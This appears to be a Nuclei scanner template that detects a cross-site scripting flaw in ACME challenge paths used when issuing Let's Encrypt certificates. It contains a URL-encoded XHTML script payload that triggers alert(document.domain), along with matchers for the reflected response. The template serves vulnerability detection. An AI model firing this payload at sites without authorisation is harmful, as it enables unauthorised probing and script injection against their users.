id: acme-xss info: name: Let's Encrypt - Cross-Site Scripting author: pdteam severity: high description: Let's Encrypt contains a cross-site scripting vulnerability when using the the ACME protocol to issue SSL certificates. reference: - https://www.mike-gualtieri.com/posts/chaining-remote-web-vulnerabilities-to-abuse-lets-encrypt - https://community.letsencrypt.org/t/xss-via-acme-implementations/72295 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 tags: xss,acme metadata: max-request: 1 http: - method: GET path: - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E' matchers-condition: and matchers: - type: word words: - "alert(document.domain)" - type: word words: - "/xml" - "/html" # Enhanced by md on 2022/09/22